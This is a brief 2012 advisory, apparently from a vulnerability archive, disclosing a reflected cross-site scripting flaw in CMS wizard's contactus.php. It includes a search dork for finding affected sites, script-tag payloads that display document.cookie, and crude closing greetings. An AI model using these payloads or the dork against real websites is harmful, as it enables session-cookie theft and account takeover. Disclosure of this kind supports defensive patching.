SecurityvulnsSECURITYVULNS:DOC:27694CMS wizard Cross Site Scripting
=================================================================
-=CMS wizard Cross Site Scripting
##########################################################
Author: XaDaL
Date: 14-02-2012
vendor: http://www.cmswizard.co.uk/
tested on: windows mobile
dork : powered by CMS wizard
##########################################################
This vulnerability affects /contactus.php.
##The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating
the user. It is also possible to modify the content of the page presented to the user.
##Attack details
URI was set to "><script>alert(document.cookie)</script>
or
"><script>alert(/XaDaL_GantenG/)</script>
or other
##=XSS=
http://localhost/contactus.php/"><script>alert(document.cookie)</script>
http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>
!#GREETZ:
kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ
xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. dan semua yang gak bisa aku sebutin satu-satu (o,0)v
all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.
and aya i love you full :*
#Bogel & dicka cyber: kapan-kapan ngopi bareng lagi gan =))
Happy fvcklentineβ¦
umbar-umbar titit hhhhhhhhhh :p